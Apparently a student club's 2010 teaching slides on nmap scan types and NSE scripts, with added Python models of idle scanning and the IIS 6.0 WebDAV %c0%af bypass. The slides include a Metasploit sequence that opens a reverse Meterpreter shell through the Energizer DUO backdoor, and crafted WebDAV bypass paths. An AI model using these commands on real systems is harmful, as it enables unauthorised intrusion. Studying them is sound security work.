4/13/2010. CSS Meeting Stephen Crane on Programming Contests Tomorrow @ 1pm Building 8 room 345...


CSS Meeting: Stephen Crane on Programming Contests, tomorrow @ 1pm, Building 8 room 345

05/11/10

CSS Programming Contest Friday @ 1pm CS Lab, Building 8


CBARN! Buy your tickets today! $30. Great food! Learn more about other clubs and the College of Business. This Friday @ 7pm


Programming Contest


nmap: “Network Mapper” (scanner). Discovery, identification, security auditing.


Scan types: Ping: -sP; TCP: -sT; UDP: -sU; SYN: -sS; Idle: -sI


Ping: -sP (host discovery only; renamed -sn in later nmap releases). As root it sends ICMP echo requests as well as TCP probes to ports 80 and 443; without root it can only attempt plain TCP connections to those two ports. Good way to map the machines on the network.


TCP: -sT. TCP connect scan: completes the full TCP handshake through the OS connect() call, so the application on the target sees (and may log) every connection. Very “noisy”. This is the default when you are not root.


UDP: -sU. Gives port state only (open, closed or open|filtered), no service info unless combined with -sV. Often forgotten. SLOW: a closed port is only recognised by the ICMP port-unreachable reply, which most hosts rate-limit, and a port that never answers can only be reported as open|filtered.


SYN: -sS. “Half-open” scanning: send a SYN, read the SYN/ACK or RST that comes back, then tear the attempt down with a RST before the handshake completes, so the application on the target never sees a connection. A “quiet” scan compared with -sT, but most IDS are on the lookout for it. Needs raw sockets, i.e. root.


Idle: -sI <zombie>. Zombie scanning: scans a machine using another one (the zombie) by sending SYNs to the target with the zombie's address as the source and reading the target's reaction off the zombie's IP ID counter. As far as the scanned machine knows, our computer never communicated with it.

Only locates open ports, no version info. Doesn't spoof the MAC address, and needs a zombie that is genuinely idle and uses a predictable, incrementing IP ID.


Advanced Features

Version information (-sV): attempts to identify the service and version behind each discovered port by sending probes and matching the replies against nmap's signature database. Can make mistakes.

OS Detection (-O): fingerprints the target's TCP/IP stack. More or less accurate. Can make mistakes.

Advanced Features

Verbosity (-v, -vv, -vvv): gives more info. Very useful; grep is your friend.

Runtime interaction: v / V: raise or lower verbosity while the scan runs. Spacebar: print a status message.

Idle: -sI (diagram: Us -> Zombie -> Target). Demo.
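The idle scan exchange from the -sI slides above, as an added example that is not code from the slides or from nmap: three toy hosts and a toy network, so the IP ID arithmetic that -sI relies on can be run offline. A real idle scan needs raw sockets and a zombie whose IP ID counter is global and incrementing; the 10.0.0.x addresses and port numbers are constructed.

```python
"""Idle (zombie) scan logic modelled in plain Python (added example)."""
from dataclasses import dataclass


@dataclass
class Packet:
    src: str      # source address as written in the header (spoofable)
    dst: str
    dport: int
    flags: str    # "SYN", "SYN/ACK" or "RST"
    ipid: int = 0


class Zombie:
    """Idle host with a globally incrementing IP ID counter (what -sI needs).
    It answers an unsolicited SYN/ACK with a RST and ignores a RST;
    every packet it emits consumes one IP ID."""
    def __init__(self, addr, ipid=1000):
        self.addr, self.ipid = addr, ipid

    def receive(self, pkt):
        if pkt.flags == "SYN/ACK":
            self.ipid += 1
            return Packet(self.addr, pkt.src, 0, "RST", self.ipid)
        return None


class Target:
    """SYN to an open port gets SYN/ACK, to a closed port RST, to a filtered port nothing."""
    def __init__(self, addr, open_ports, filtered_ports=()):
        self.addr = addr
        self.open_ports, self.filtered_ports = set(open_ports), set(filtered_ports)

    def receive(self, pkt):
        if pkt.flags != "SYN" or pkt.dport in self.filtered_ports:
            return None
        flags = "SYN/ACK" if pkt.dport in self.open_ports else "RST"
        return Packet(self.addr, pkt.src, 0, flags)


class Scanner:
    """Our host: it only needs to read IP IDs off the RSTs the zombie sends us."""
    def __init__(self, addr):
        self.addr, self.inbox = addr, []

    def receive(self, pkt):
        self.inbox.append(pkt)
        return None


class Network:
    """Delivers a packet and every reply it triggers. Replies go to the
    header source address, which is exactly what makes spoofing work."""
    def __init__(self, hosts):
        self.hosts = {h.addr: h for h in hosts}
        self.wire = []                       # everything seen on the wire

    def send(self, pkt):
        while pkt is not None:
            self.wire.append(pkt)
            host = self.hosts.get(pkt.dst)
            pkt = host.receive(pkt) if host else None


def probe_zombie_ipid(net, us, zombie_addr):
    """SYN/ACK the zombie from our real address; it RSTs back with its current IP ID."""
    us.inbox.clear()
    net.send(Packet(us.addr, zombie_addr, 0, "SYN/ACK"))
    return us.inbox[-1].ipid


def idle_scan_port(net, us, zombie_addr, target_addr, port):
    before = probe_zombie_ipid(net, us, zombie_addr)
    # Spoofed SYN: the header says the zombie sent it, so the target's answer
    # (if any) goes to the zombie and our address never reaches the target.
    net.send(Packet(zombie_addr, target_addr, port, "SYN"))
    delta = probe_zombie_ipid(net, us, zombie_addr) - before
    if delta == 2:      # zombie RST'd the target's SYN/ACK, then RST'd our probe
        return "open"
    if delta == 1:      # zombie only answered our probe
        return "closed|filtered"
    return "unknown"    # zombie is not idle, or its IP IDs are not incremental


def target_saw_scanner(net, us_addr, target_addr):
    return any(p.src == us_addr and p.dst == target_addr for p in net.wire)


def demo():
    us = Scanner("10.0.0.1")        # constructed lab addresses
    zombie = Zombie("10.0.0.2")
    target = Target("10.0.0.3", open_ports={80, 443}, filtered_ports={25})
    net = Network([us, zombie, target])
    results = {p: idle_scan_port(net, us, zombie.addr, target.addr, p) for p in (80, 22, 25)}
    results["target_saw_us"] = target_saw_scanner(net, us.addr, target.addr)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Note what the model makes visible: a closed port and a filtered port both leave the zombie's counter one step ahead, which is why nmap can only report closed|filtered for them, and the scanner's own address never appears in a packet addressed to the target.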

Scripting engine (NSE): custom-written scans; vulnerability scanning and exploitation (kinda). Scripts are written in Lua.


Two types of scripts: service scripts (run against a matching open port) and host scripts (run once per host).

Nine categories: auth, default, discovery, external, intrusive, malware, safe, version, vuln


Scripts location: /usr/share/nmap/scripts, /usr/local/share/nmap/scripts, or C:\Program Files\Nmap\scripts

Rebuild the script database after adding a script: nmap --script-updatedb

Command format: nmap --script=<script_name> target


Scripts covered: Energizer Trojan, IIS WebDAV

Energizer Trojan Script

A backdoor was found in the Energizer DUO USB charger software.

Might have been a mistake. We don't really care.

It listens on TCP port 7777 of the infected machine.

Detection is now built into nmap's version scan: nmap -sV -p7777 target

Energizer Trojan Script

Metasploit! Metasploit has a module that will exploit the trojan:

> use exploit/windows/backdoor/energizer_duo_payload
> set rhost target.ip
> set payload windows/meterpreter/reverse_tcp
> set lhost your.ip
> exploit

IIS WebDAV script

WebDAV allows users of a website to modify files on the web server. A vulnerability was found in the IIS 6.0 WebDAV implementation (CVE-2009-1535, MS09-020): a remote authentication bypass caused by a parsing error in how the server handled Unicode (overlong UTF-8) characters in the request path.

Nmap has a script!

IIS WebDAV script

The script can identify vulnerable files on the webserver

nmap --script http-iis-webdav-vuln.nse target

IIS WebDAV script

Let's exploit it manually. The vulnerable server improperly parses the overlong UTF-8 encoding of '/' (bytes 0xc0 0xaf, sent as %c0%af in the URL): the authentication check runs on the raw request path, where that sequence does not look like a path separator, and the path is only decoded into a '/' afterwards. We'll use telnet to type the crafted request by hand.
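The bug behind both the http-iis-webdav-vuln script and the manual telnet exploit above, modelled as an added example that is not code from the slides, from nmap's script or from IIS: a toy server that authorises on the raw request line and decodes the path leniently afterwards, beside a fixed version that decodes strictly and canonicalises before authorising. The /protected/ folder, file name and host name are constructed; the Translate: f header in the request builder is the one the referenced exploit-db advisory sends so IIS routes the request through WebDAV, not something the slides state.

```python
"""Why %c0%af bypasses the IIS 6.0 WebDAV auth check (added example)."""
import urllib.parse

PROTECTED = "/protected/"        # constructed: folder that requires a login


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 the way a permissive decoder does (ASCII and two-byte
    forms only, enough for this bug): the overlong sequence C0 AF is
    accepted and mapped to U+002F '/'. bytes.decode('utf-8') rejects it."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data) and 0x80 <= data[i + 1] < 0xC0:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError("byte sequence not handled at offset %d" % i)
    return "".join(out)


def canonicalize(path: str) -> str:
    """Collapse repeated slashes and resolve '.' and '..' from the root."""
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts)


def authorized(path: str, authenticated: bool) -> bool:
    return authenticated or not path.startswith(PROTECTED)


def vulnerable_server(raw_path: str, authenticated: bool = False):
    """Bug: authorisation looks at the request line as received; the path
    is percent-decoded, leniently UTF-8-decoded and normalised only later."""
    if not authorized(raw_path, authenticated):
        return 401, None
    decoded = lenient_utf8_decode(urllib.parse.unquote_to_bytes(raw_path))
    return 200, canonicalize(decoded)


def fixed_server(raw_path: str, authenticated: bool = False):
    """Fix: decode strictly (overlong forms are rejected), canonicalise,
    and only then authorise on the canonical path."""
    try:
        decoded = urllib.parse.unquote_to_bytes(raw_path).decode("utf-8")
    except UnicodeDecodeError:
        return 400, None
    path = canonicalize(decoded)
    if not authorized(path, authenticated):
        return 401, None
    return 200, path


def build_request(path: str, host: str) -> str:
    """The lines to paste into the telnet session. 'Translate: f' is the
    header from the referenced advisory that makes IIS hand the request to
    the WebDAV handler instead of the static file handler."""
    return "GET %s HTTP/1.1\r\nHost: %s\r\nTranslate: f\r\n\r\n" % (path, host)


if __name__ == "__main__":
    for p in ("/protected/secret.txt",            # straight request: 401
              "/..%c0%af/protected/secret.txt",   # form used in the advisory
              "/%c0%afprotected/secret.txt"):     # form the nmap script probes with
        print(p, vulnerable_server(p), fixed_server(p))
        print(build_request(p, "iis6.example.test"))
```

Both crafted paths pass the raw-path check because neither starts with /protected/, and both canonicalise to /protected/secret.txt once the overlong byte pair has become a slash; the fixed server never gets that far because a strict decoder refuses C0 AF outright.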

Extra Stuff

“default” script scan (-sC): runs every script in the default category. Very noisy, very intrusive. Gives you a lot of info.

“Aggressive” scan (-A): equivalent to -O -sV -sC --traceroute. Again, very noisy, but lots and lots of info.

Closing remarks

nmap is a tool you should be familiar with

There are many more techniques and scans that I did not cover

Be mindful of whom you are scanning (and of any laws regarding scans)

Questions?

References

Nmap main site: www.nmap.org and nmap.org/book/nse.html

Comprehensive Guide to nmap: http://www.networkuptime.com/nmap/index.shtml

SkullSecurity: http://www.skullsecurity.org/

WebDAV: http://www.exploit-db.com/exploits/8704

Energizer Trojan: http://www.skullsecurity.org/blog/?p=563